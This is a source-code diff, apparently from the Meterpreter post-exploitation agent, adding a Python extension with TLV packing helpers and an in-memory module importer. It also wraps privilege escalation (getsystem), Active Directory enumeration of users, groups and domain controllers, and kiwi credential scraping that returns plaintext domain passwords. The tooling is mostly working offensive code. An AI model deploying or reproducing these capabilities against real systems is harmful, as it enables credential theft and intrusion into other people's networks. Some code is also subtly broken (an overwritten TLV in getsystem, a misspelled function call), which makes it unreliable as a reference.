TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
NULL_BYTE = '\x00'
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
else:
tlv = args[0]
data = ''
value = tlv['value']
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if isinstance(value, float):
value = int(round(value))
data = struct.pack('>III', 12, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
else:
if value.__class__.__name__ == 'unicode':
value = value.encode('UTF-8')
elif not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
def packet_enum_tlvs(pkt, tlv_type = None):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset+8])
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type':tlv[1], 'length':tlv[0], 'value':val}
offset += tlv[0]
raise StopIteration()
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
# END OF COPY PASTE
def validate_bindings(required):
"""Use to make sure that the current set of bindings that is available
in Meterpreter's bindings list contains all those that are required by
the caller."""
missing = set(required) - set(dir(meterpreter_bindings))
if len(missing) > 0:
raise Exception('Missing bindings: {0}'.format(list(missing)))
def invoke_meterpreter(method, is_local, tlv = ""):
validate_bindings([method])
header = struct.pack('>I', PACKET_TYPE_REQUEST)
header += tlv_pack(TLV_TYPE_METHOD, method)
header += tlv_pack(TLV_TYPE_REQUEST_ID, 0)
req = struct.pack('>I', len(header) + len(tlv) + 4) + header + tlv
return getattr(meterpreter_bindings, method)(is_local, req)
def rnd_string(n):
return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(n))

25
c/meterpreter/source/extensions/python/Lib/meterpreter/elevate.py Normal file
View File

@ -0,0 +1,25 @@
import meterpreter_bindings
from meterpreter.core import *
TLV_PRIV_EXTENSION = 20000
TLV_TYPE_ELEVATE_TECHNIQUE = TLV_META_TYPE_UINT | (TLV_PRIV_EXTENSION + 200)
TLV_TYPE_ELEVATE_SERVICE_NAME = TLV_META_TYPE_STRING | (TLV_PRIV_EXTENSION + 201)
# We only support technique 1 (as it's the only one that doesn't require DLLs)
def getsystem():
tlv = tlv_pack(TLV_TYPE_ELEVATE_TECHNIQUE, 1)
tlv = tlv_pack(TLV_TYPE_ELEVATE_SERVICE_NAME, rnd_string(5))
resp = invoke_meterpreter('priv_elevate_getsystem', True, tlv)
if resp == None:
return False
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
def rev2self():
resp = invoke_meterpreter('stdapi_sys_config_rev2self', True)
if resp == None:
return False
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0

2
c/meterpreter/source/extensions/python/Lib/meterpreter/extapi/__init__.py Normal file
View File

@ -0,0 +1,2 @@
__all__ = ['adsi']

113
c/meterpreter/source/extensions/python/Lib/meterpreter/extapi/adsi.py Normal file
View File

@ -0,0 +1,113 @@
import meterpreter_bindings
from meterpreter.core import *
TLV_EXTAPI_EXTENSION = 20000
TLV_TYPE_EXTAPI_ADSI_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTAPI_EXTENSION + 54)
TLV_TYPE_EXTAPI_ADSI_FILTER = TLV_META_TYPE_STRING | (TLV_EXTAPI_EXTENSION + 55)
TLV_TYPE_EXTAPI_ADSI_FIELD = TLV_META_TYPE_STRING | (TLV_EXTAPI_EXTENSION + 56)
TLV_TYPE_EXTAPI_ADSI_RESULT = TLV_META_TYPE_GROUP | (TLV_EXTAPI_EXTENSION + 57)
TLV_TYPE_EXTAPI_ADSI_MAXRESULTS = TLV_META_TYPE_UINT | (TLV_EXTAPI_EXTENSION + 58)
TLV_TYPE_EXTAPI_ADSI_PAGESIZE = TLV_META_TYPE_UINT | (TLV_EXTAPI_EXTENSION + 59)
TLV_TYPE_EXTAPI_ADSI_ARRAY = TLV_META_TYPE_GROUP | (TLV_EXTAPI_EXTENSION + 60)
TLV_TYPE_EXTAPI_ADSI_STRING = TLV_META_TYPE_STRING | (TLV_EXTAPI_EXTENSION + 61)
TLV_TYPE_EXTAPI_ADSI_NUMBER = TLV_META_TYPE_UINT | (TLV_EXTAPI_EXTENSION + 62)
TLV_TYPE_EXTAPI_ADSI_BIGNUMBER = TLV_META_TYPE_QWORD | (TLV_EXTAPI_EXTENSION + 63)
TLV_TYPE_EXTAPI_ADSI_BOOL = TLV_META_TYPE_BOOL | (TLV_EXTAPI_EXTENSION + 64)
TLV_TYPE_EXTAPI_ADSI_RAW = TLV_META_TYPE_RAW | (TLV_EXTAPI_EXTENSION + 65)
TLV_TYPE_EXTAPI_ADSI_PATH = TLV_META_TYPE_GROUP | (TLV_EXTAPI_EXTENSION + 66)
TLV_TYPE_EXTAPI_ADSI_PATH_VOL = TLV_META_TYPE_STRING | (TLV_EXTAPI_EXTENSION + 67)
TLV_TYPE_EXTAPI_ADSI_PATH_PATH = TLV_META_TYPE_STRING | (TLV_EXTAPI_EXTENSION + 68)
TLV_TYPE_EXTAPI_ADSI_PATH_TYPE = TLV_META_TYPE_UINT | (TLV_EXTAPI_EXTENSION + 69)
TLV_TYPE_EXTAPI_ADSI_DN = TLV_META_TYPE_GROUP | (TLV_EXTAPI_EXTENSION + 70)
def enum_dcs(domain_name, max_results = None, page_size = None):
query_filter = '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
fields = ['name', 'dnshostname', 'distinguishedname', 'operatingsystem',
'operatingsystemversion', 'operatingsystemservicepack', 'description', 'comment']
return domain_query(domain_name, query_filter, fields, max_results, page_size)
def enum_users(domain_name, max_results = None, page_size = None):
query_filter = '(objectClass=user)'
fields = ['samaccountname', 'name', 'distinguishedname', 'description', 'comment']
return domain_query(domain_name, query_filter, fields, max_results, page_size)
def enum_groups(domain_name, max_results = None, page_size = None):
query_filter = '(objectClass=group)'
fields = ['name', 'distinguishedname', 'description']
return domain_query(domain_name, query_filter, fields, max_results, page_size)
def enum_group_users_nested(domain_name, group_dn, max_results = None, page_size = None):
query_filter = '(&(objectClass=user)(memberof:1.2.840.113556.1.4.1941:={0}))'.format(group_dn)
fields = ['samaccountname', 'name', 'distinguishedname', 'description', 'comment']
return domain_query(domain_name, query_filter, fields, max_results, page_size)
def enum_computers(domain_name, max_results = None, page_size = None):
query_filter = '(objectClass=computer)'
fields = ['name', 'dnshostname', 'distinguishedname', 'operatingsystem',
'operatingsystemversion', 'operatingsystemservicepack', 'description', 'comment']
return domain_query(domain_name, query_filter, fields, max_results, page_size)
def domain_query(domain_name, query_filter, fields, max_results = None, page_size = None):
tlv = tlv_pack(TLV_TYPE_EXTAPI_ADSI_DOMAIN, domain_name)
tlv += tlv_pack(TLV_TYPE_EXTAPI_ADSI_FILTER, query_filter)
if max_results:
tlv += tlv_pack(TLV_TYPE_EXTAPI_ADSI_MAXRESULTS, max_results)
if page_size:
tlv += tlv_pack(TLV_TYPE_EXTAPI_ADSI_PAGESIZE, page_size)
for f in fields:
tlv += tlv_pack(TLV_TYPE_EXTAPI_ADSI_FIELD, f)
resp = invoke_meterpreter('extapi_adsi_domain_query', True, tlv)
if resp == None:
return None
if packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] != 0:
return None
results = []
for result_tlv in packet_enum_tlvs(resp, TLV_TYPE_EXTAPI_ADSI_RESULT):
results.append(extract_values(result_tlv['value'], fields))
return results
def extract_values(result_tlv, fields = None):
if fields:
values = [extract_value(v['type'], v['value'], fields[i]) for i, v in enumerate(packet_enum_tlvs(result_tlv))]
return dict(values)
return [extact_value(v['type'], v['value'], None) for v in packet_enum_tlvs(result_tlv)]
def extract_value(vtype, vval, field = None):
result = None
if vtype == TLV_TYPE_EXTAPI_ADSI_STRING:
result = ('string', vval)
elif vtype == TLV_TYPE_EXTAPI_ADSI_NUMBER:
result = ('int', vval)
elif vtype == TLV_TYPE_EXTAPI_ADSI_BIGNUMBER:
result = ('int', vval)
elif vtype == TLV_TYPE_EXTAPI_ADSI_BOOL:
result = ('bool', vval != 0)
elif vtype == TLV_TYPE_EXTAPI_ADSI_RAW:
result = ('raw', vval)
elif vtype == TLV_TYPE_EXTAPI_ADSI_ARRAY:
result = ('array', extract_values(vval))
elif vtype == TLV_TYPE_EXTAPI_ADSI_PATH:
vol = packet_get_tlv(vval, TLV_TYPE_EXTAPI_ADSI_PATH_VOL)
path = packet_get_tlv(vval, TLV_TYPE_EXTAPI_ADSI_PATH_PATH)
vol_type = packet_get_tlv(vval, TLV_TYPE_EXTAPI_ADSI_PATH_TYPE)
result = ('path', vol, path, vol_type)
elif vtype == TLV_TYPE_EXTAPI_ADSI_DN:
values = list(packet_enum_tlvs(vval))
val_type = 'string' if values[1].type == TLV_TYPE_EXTAPI_ADSI_STRING else 'raw'
result = ('dn', values[0].value, val_type, values[1].value)
else:
result = ('unknown', vval)
if field:
return (field, result)
return result

46
c/meterpreter/source/extensions/python/Lib/meterpreter/kiwi.py Normal file
View File

@ -0,0 +1,46 @@
import meterpreter_bindings
import meterpreter.user
from meterpreter.core import *
TLV_KIWI_EXTENSION = 20000
TLV_TYPE_KIWI_PWD_ID = TLV_META_TYPE_UINT | (TLV_KIWI_EXTENSION + 1)
TLV_TYPE_KIWI_PWD_RESULT = TLV_META_TYPE_GROUP | (TLV_KIWI_EXTENSION + 2)
TLV_TYPE_KIWI_PWD_USERNAME = TLV_META_TYPE_STRING | (TLV_KIWI_EXTENSION + 3)
TLV_TYPE_KIWI_PWD_DOMAIN = TLV_META_TYPE_STRING | (TLV_KIWI_EXTENSION + 4)
TLV_TYPE_KIWI_PWD_PASSWORD = TLV_META_TYPE_STRING | (TLV_KIWI_EXTENSION + 5)
TLV_TYPE_KIWI_PWD_AUTH_HI = TLV_META_TYPE_UINT | (TLV_KIWI_EXTENSION + 6)
TLV_TYPE_KIWI_PWD_AUTH_LO = TLV_META_TYPE_UINT | (TLV_KIWI_EXTENSION + 7)
TLV_TYPE_KIWI_PWD_LMHASH = TLV_META_TYPE_STRING | (TLV_KIWI_EXTENSION + 8)
TLV_TYPE_KIWI_PWD_NTLMHASH = TLV_META_TYPE_STRING | (TLV_KIWI_EXTENSION + 9)
def creds_all():
if not meterpreter.user.is_system():
raise Exception('Unable to extract credentials: Not running as SYSTEM')
tlv = tlv_pack(TLV_TYPE_KIWI_PWD_ID, 0)
resp = invoke_meterpreter('kiwi_scrape_passwords', True, tlv)
if resp == None:
return False
if packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] != 0:
return False
found = set([])
creds = []
for group in packet_enum_tlvs(resp, TLV_TYPE_KIWI_PWD_RESULT):
domain = packet_get_tlv(group['value'], TLV_TYPE_KIWI_PWD_DOMAIN)
username = packet_get_tlv(group['value'], TLV_TYPE_KIWI_PWD_USERNAME)
password = packet_get_tlv(group['value'], TLV_TYPE_KIWI_PWD_PASSWORD)
if domain and username and password:
key = '{0}\x01{1}\x01{2}'.format(domain['value'], username['value'], password['value'])
if not key in found:
found.add(key)
creds.append({
'Domain': domain['value'],
'Username': username['value'],
'Password': password['value']
})
return creds

27
c/meterpreter/source/extensions/python/Lib/meterpreter/sys.py Normal file
View File

@ -0,0 +1,27 @@
import meterpreter_bindings
from meterpreter.core import *
TLV_STDAPI_EXTENSION = 0
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1040)
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1041)
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1043)
TLV_TYPE_LANG_SYSTEM = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1044)
TLV_TYPE_DOMAIN = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1046)
TLV_TYPE_LOGGED_ON_USER_COUNT = TLV_META_TYPE_UINT | (TLV_STDAPI_EXTENSION + 1047)
def info():
resp = invoke_meterpreter('stdapi_sys_config_sysinfo', True)
if resp == None:
return False
return {
'Host': packet_get_tlv(resp, TLV_TYPE_COMPUTER_NAME)['value'],
'OS': packet_get_tlv(resp, TLV_TYPE_OS_NAME)['value'],
'Arch': packet_get_tlv(resp, TLV_TYPE_ARCHITECTURE)['value'],
'Lang': packet_get_tlv(resp, TLV_TYPE_LANG_SYSTEM)['value'],
'Domain': packet_get_tlv(resp, TLV_TYPE_DOMAIN)['value'],
'LoggedOn': packet_get_tlv(resp, TLV_TYPE_LOGGED_ON_USER_COUNT)['value']
}

27
c/meterpreter/source/extensions/python/Lib/meterpreter/user.py Normal file
View File

@ -0,0 +1,27 @@
import meterpreter_bindings
from meterpreter.core import *
TLV_STDAPI_EXTENSION = 0
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1042)
TLV_TYPE_SID = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1045)
SYSTEM_SID = "S-1-5-18"
def getuid():
resp = invoke_meterpreter('stdapi_sys_config_getuid', True)
if resp == None:
return False
return packet_get_tlv(resp, TLV_TYPE_USER_NAME)['value']
def getsid():
resp = invoke_meterpreter('stdapi_sys_config_getsid', True)
if resp == None:
return False
return packet_get_tlv(resp, TLV_TYPE_SID)['value']
def is_system():
return getsid() == SYSTEM_SID

2
c/meterpreter/source/extensions/python/Modules/_ctypes/callbacks.c
View File

@ -646,7 +646,7 @@ STDAPI DllCanUnloadNow(void)
} }
#ifndef Py_NO_ENABLE_SHARED #ifndef Py_NO_ENABLE_SHARED
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvRes) BOOL WINAPI CtypesDllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvRes)
{ {
switch(fdwReason) { switch(fdwReason) {
case DLL_PROCESS_ATTACH: case DLL_PROCESS_ATTACH:

2
c/meterpreter/source/extensions/python/PC/dl_nt.c
View File

@ -76,7 +76,7 @@ void _Py_DeactivateActCtx(ULONG_PTR cookie)
OutputDebugString("Python failed to de-activate the activation context\n"); OutputDebugString("Python failed to de-activate the activation context\n");
} }
BOOL WINAPI DllMain (HANDLE hInst, BOOL WINAPI PythonDllMain (HANDLE hInst,
ULONG ul_reason_for_call, ULONG ul_reason_for_call,
LPVOID lpReserved) LPVOID lpReserved)
{ {

4
c/meterpreter/source/extensions/python/PC/pythonnt_rc.h Executable file
View File

@ -0,0 +1,4 @@
/* This file created by python.props /t:GeneratePythonNtRcH */
#define FIELD3 10150
#define MS_DLL_ID "2.7-32"
#define PYTHON_DLL_NAME "python27.dll"

126
c/meterpreter/source/extensions/python/Resource Files/met_importer.py Normal file
View File

@ -0,0 +1,126 @@
import sys, imp, marshal
met_dbg_trace = False
met_mod_name = None
met_mod_body = None
def met_init(dbg):
global met_dbg_trace
global met_finder
global met_lib_data
met_dbg_trace = dbg
met_finder = MetFinder(met_lib_data[1])
sys.meta_path=[met_finder]
if not dbg:
del met_lib_data
def met_dbg(s):
global met_dbg_trace
if met_dbg_trace:
print s
def met_import_code():
global met_mod_body
global met_mod_name
global met_finder
try:
if met_mod_body != None:
if met_mod_name == None:
met_mod_name = 'met_imported_code'
if met_mod_body[:4] == imp.get_magic():
met_mod_body = marshal.loads(met_mod_body[8:])
else:
met_mod_body = compile(met_mod_body, met_mod_name, 'exec')
met_finder.loader.add_module(met_mod_name, met_mod_body)
else:
raise ValueError("met_mod_body not specified")
finally:
# always reset these two
met_mod_name = None
met_mod_body = None
class MetLoader:
def __init__(self, libs):
self.libs = libs
if met_dbg_trace:
for l in libs.keys():
met_dbg(l)
met_dbg('Total libs: {0}'.format(len(libs.keys())))
def add_module(self, name, code):
imp.acquire_lock()
try:
mod = imp.new_module(name)
sys.modules[name] = mod
try:
mod.__file__ = name + ".py"
exec code in mod.__dict__
mod.__loader__ = self
met_dbg('Executed code for: {0}'.format(name))
except e:
del sys.modules[name]
mod = None
except:
mod = None
finally:
imp.release_lock()
met_dbg('Result for {0}: {1}'.format(name, mod != None))
def load_module(self, name):
met_dbg('Searching for: {0}'.format(name))
if name in sys.modules:
met_dbg('Already loaded: {0}'.format(name))
return sys.modules[name]
if not name in self.libs:
if '.' in name:
return self.load_module('.'.join(name.split('.')[1:]))
met_dbg('No lib: {0}'.format(name))
return None
met_dbg('Lib exists: {0}'.format(name))
filename, package, code = self.libs[name]
met_dbg('Lib details: {0} - {1}'.format(filename, package))
imp.acquire_lock()
mod = None
try:
mod = imp.new_module(name)
sys.modules[name] = mod
try:
mod.__file__ = filename
if package:
mod.__path__ = [name.replace('.', '\\')]
exec code in mod.__dict__
mod.__loader__ = self
met_dbg('Executed code for: {0}'.format(name))
except Exception as e:
met_dbg('Exception thrown importing module: {0} - {1}'.format(name, e))
del sys.modules[name]
mod = None
except Exception as ex:
met_dbg('Exception thrown starting import: {0} - {1}'.format(name, ex))
mod = None
finally:
imp.release_lock()
#if mod == None and '.' in name:
#return self.load_module('.'.join(name.split('.')[1:]))
met_dbg('Result for {0}: {1}'.format(name, mod != None))
return mod
class MetFinder:
def __init__(self, libs):
self.loader = MetLoader(libs)
def find_module(self, name, path = None):
return self.loader

43
c/meterpreter/source/extensions/python/Resource Files/package.py Normal file
View File

@ -0,0 +1,43 @@
#!/usr/bin/env python
import os,struct,py_compile,zlib,marshal
def w(f,c):
with open(f,'wb') as f:
f.write(c)
def r(f):
with open(f,'rb') as f:
return f.read()
def p(d):
return struct.pack('<L', d)
modules = {}
here = os.getcwd()
folder = '../Lib'
os.chdir(folder)
for entry in os.listdir('.'):
if os.path.isfile(entry):
if entry.endswith('.py'):
path = entry.split('.')[0]
print path
modules[path] = (entry, False, compile(r(entry), entry, 'exec'))
else:
for root, _, files in os.walk(entry):
for f in [x for x in files if x.endswith('.py')]:
path = os.path.join(root, f)
modname = path.split('.')[0].replace('\\', '.').replace('.__init__', '')
print modname
modules[modname] = (path, True, compile(r(path), path, 'exec'))
os.chdir(here)
importer = compile(r('met_importer.py'), 'met_importer.py', 'exec')
print 'Total modules: {0}'.format(len(modules.keys()))
content = zlib.compress(marshal.dumps([importer, modules]), 9)
w('python_core.cz', p(len(content)) + content)

BIN
c/meterpreter/source/extensions/python/Resource Files/python_core.cz Executable file
View File

Binary file not shown.

3
c/meterpreter/source/extensions/python/Resource Files/python_core.rc Executable file
View File

@ -0,0 +1,3 @@
#include "python_core.rh"
IDR_PYTHON_CORE BINARY MOVEABLE PURE "python_core.cz"

1
c/meterpreter/source/extensions/python/Resource Files/python_core.rh Normal file
View File

@ -0,0 +1 @@
#define IDR_PYTHON_CORE 1337

501
c/meterpreter/source/extensions/python/python_commands.c Executable file
View File

@ -0,0 +1,501 @@
/*!
* @file python_commands.c
* @brief Definitions for the python command bindings.
*/
#include "Python.h"
#include "marshal.h"
#include "python_main.h"
#include "python_commands.h"
#include "python_meterpreter_binding.h"
#include "Resource Files/python_core.rh"
///! @brief List of valid python code types for loading
#define PY_CODE_TYPE_STRING 0
#define PY_CODE_TYPE_PY 1
#define PY_CODE_TYPE_PYC 2
///! @brief Struct that contains pointer to init function and name.
typedef struct _InitFunc
{
#ifdef DEBUGTRACE
PCHAR name;
#endif
PyMODINIT_FUNC(*func)(void);
} InitFunc;
#ifdef DEBUGTRACE
#define DEC_INIT_FUNC(x) { #x, x }
#else
#define DEC_INIT_FUNC(x) { x }
#endif
// All external python functions we have baked into the runtime which let us deploy
// it as one chunk rather than dynamically loading libs.
extern PyMODINIT_FUNC initerrno(void);
extern PyMODINIT_FUNC init_functools(void);
extern PyMODINIT_FUNC init_socket(void);
extern PyMODINIT_FUNC init_weakref(void);
extern PyMODINIT_FUNC initarray(void);
extern PyMODINIT_FUNC initaudioop(void);
extern PyMODINIT_FUNC init_csv(void);
extern PyMODINIT_FUNC init_io(void);
extern PyMODINIT_FUNC init_multibytecodec(void);
extern PyMODINIT_FUNC init_bisect(void);
extern PyMODINIT_FUNC init_codecs(void);
extern PyMODINIT_FUNC init_collections(void);
extern PyMODINIT_FUNC init_heapq(void);
extern PyMODINIT_FUNC init_locale(void);
extern PyMODINIT_FUNC init_lsprof(void);
extern PyMODINIT_FUNC init_random(void);
extern PyMODINIT_FUNC init_sre(void);
extern PyMODINIT_FUNC init_struct(void);
extern PyMODINIT_FUNC init_weakref(void);
extern PyMODINIT_FUNC initaudioop(void);
extern PyMODINIT_FUNC initbinascii(void);
extern PyMODINIT_FUNC initcmath(void);
extern PyMODINIT_FUNC initcPickle(void);
extern PyMODINIT_FUNC initcStringIO(void);
extern PyMODINIT_FUNC initdatetime(void);
extern PyMODINIT_FUNC initfuture_builtins(void);
extern PyMODINIT_FUNC initgc(void);
extern PyMODINIT_FUNC initimageop(void);
extern PyMODINIT_FUNC inititertools(void);
extern PyMODINIT_FUNC initmath(void);
extern PyMODINIT_FUNC init_md5(void);
extern PyMODINIT_FUNC initmmap(void);
extern PyMODINIT_FUNC initoperator(void);
extern PyMODINIT_FUNC initparser(void);
extern PyMODINIT_FUNC initnt(void);
extern PyMODINIT_FUNC init_sha256(void);
extern PyMODINIT_FUNC init_sha512(void);
extern PyMODINIT_FUNC init_sha(void);
extern PyMODINIT_FUNC initsignal(void);
extern PyMODINIT_FUNC initstrop(void);
extern PyMODINIT_FUNC init_symtable(void);
extern PyMODINIT_FUNC initthread(void);
extern PyMODINIT_FUNC inittime(void);
extern PyMODINIT_FUNC initxxsubtype(void);
extern PyMODINIT_FUNC initzipimport(void);
extern PyMODINIT_FUNC init_subprocess(void);
extern PyMODINIT_FUNC init_winreg(void);
extern PyMODINIT_FUNC initselect(void);
extern PyMODINIT_FUNC initunicodedata(void);
extern PyMODINIT_FUNC init_ctypes(void);
extern PyMODINIT_FUNC initmsvcrt(void);
extern PyMODINIT_FUNC init_ssl(void);
/// order of these is actually important
static InitFunc init_funcs[] =
{
// the functions below that are commented out are invoked prior
// to the python modules being included.
//DEC_INIT_FUNC(initerrno),
//DEC_INIT_FUNC(initnt),
//DEC_INIT_FUNC(init_socket),
//DEC_INIT_FUNC(init_functools),
DEC_INIT_FUNC(initmsvcrt),
DEC_INIT_FUNC(initselect),
DEC_INIT_FUNC(init_weakref),
DEC_INIT_FUNC(initarray),
DEC_INIT_FUNC(initaudioop),
DEC_INIT_FUNC(init_csv),
DEC_INIT_FUNC(init_io),
DEC_INIT_FUNC(init_multibytecodec),
DEC_INIT_FUNC(init_bisect),
DEC_INIT_FUNC(init_codecs),
DEC_INIT_FUNC(init_collections),
DEC_INIT_FUNC(init_heapq),
DEC_INIT_FUNC(init_locale),
DEC_INIT_FUNC(init_lsprof),
DEC_INIT_FUNC(init_random),
DEC_INIT_FUNC(init_sre),
DEC_INIT_FUNC(init_struct),
DEC_INIT_FUNC(init_weakref),
DEC_INIT_FUNC(initaudioop),
DEC_INIT_FUNC(initbinascii),
DEC_INIT_FUNC(initcmath),
DEC_INIT_FUNC(initcStringIO),
DEC_INIT_FUNC(initcPickle),
DEC_INIT_FUNC(inittime),
DEC_INIT_FUNC(initdatetime),
DEC_INIT_FUNC(initgc),
DEC_INIT_FUNC(initimageop),
DEC_INIT_FUNC(inititertools),
DEC_INIT_FUNC(initfuture_builtins),
DEC_INIT_FUNC(initmath),
DEC_INIT_FUNC(init_md5),
DEC_INIT_FUNC(initmmap),
DEC_INIT_FUNC(initoperator),
DEC_INIT_FUNC(initparser),
DEC_INIT_FUNC(init_sha256),
DEC_INIT_FUNC(init_sha512),
DEC_INIT_FUNC(init_sha),
DEC_INIT_FUNC(initsignal),
DEC_INIT_FUNC(initstrop),
DEC_INIT_FUNC(init_symtable),
DEC_INIT_FUNC(initunicodedata),
DEC_INIT_FUNC(initthread),
DEC_INIT_FUNC(initxxsubtype),
DEC_INIT_FUNC(initzipimport),
DEC_INIT_FUNC(init_subprocess),
DEC_INIT_FUNC(init_winreg),
DEC_INIT_FUNC(init_ctypes),
DEC_INIT_FUNC(init_ssl),
DEC_INIT_FUNC(NULL)
};
static LIST* stderrBuffer = NULL;
static LIST* stdoutBuffer = NULL;
static LPBYTE coreLibPointer = NULL;
static DWORD coreLibSize = 0;
static PyObject* handle_write(LIST* target, PyObject* self, PyObject* args)
{
const char* written = NULL;
if (PyArg_ParseTuple(args, "s", &written))
{
dprintf("[PYTHON] something written to %p: %s", target, written);
if (target != NULL)
{
list_add(target, strdup(written));
}
}
else
{
dprintf("[PYTHON] something written to %p (can't parse)", target);
}
return Py_BuildValue("");
}
static PyObject* handle_flush(PyObject* self, PyObject* args)
{
return Py_BuildValue("");
}
static PyObject* handle_stderr(PyObject* self, PyObject* args)
{
return handle_write(stderrBuffer, self, args);
}
static PyObject* handle_stdout(PyObject* self, PyObject* args)
{
return handle_write(stdoutBuffer, self, args);
}
///! @brief Defines a hook for catching stdout
static PyMethodDef meterpreter_stdout_hooks[] =
{
{ "write", handle_stdout, METH_VARARGS, "Write something to stdout" },
{ "flush", handle_flush, METH_NOARGS, "Flush stdout" },
{ NULL, NULL, 0, NULL }
};
///! @brief Defines a hook for catching stderr
static PyMethodDef meterpreter_stderr_hooks[] =
{
{ "write", handle_stderr, METH_VARARGS, "Write something to stderr" },
{ "flush", handle_flush, METH_NOARGS, "Flush stderr" },
{ NULL, NULL, 0, NULL }
};
static VOID dump_to_packet(LIST* source, Packet* packet, UINT tlvType)
{
lock_acquire(source->lock);
PNODE current = source->start;
while (current != NULL)
{
packet_add_tlv_string(packet, tlvType, (LPCSTR)current->data);
current = current->next;
}
lock_release(source->lock);
}
VOID clear_std_handler(LIST* source)
{
dprintf("[PYTHON] clearing list %p", source);
list_clear(source, free);
dprintf("[PYTHON] cleared list %p", source);
}
VOID initialize_std_handlers()
{
dprintf("[PYTHON] initializing handlers");
if (stderrBuffer == NULL)
{
stderrBuffer = list_create();
}
if (stdoutBuffer == NULL)
{
stdoutBuffer = list_create();
}
dprintf("[PYTHON] initialized handlers");
}
VOID destroy_std_handlers()
{
dprintf("[PYTHON] destroying handlers");
clear_std_handler(stderrBuffer);
list_destroy(stderrBuffer);
stderrBuffer = NULL;
clear_std_handler(stdoutBuffer);
list_destroy(stdoutBuffer);
stdoutBuffer = NULL;
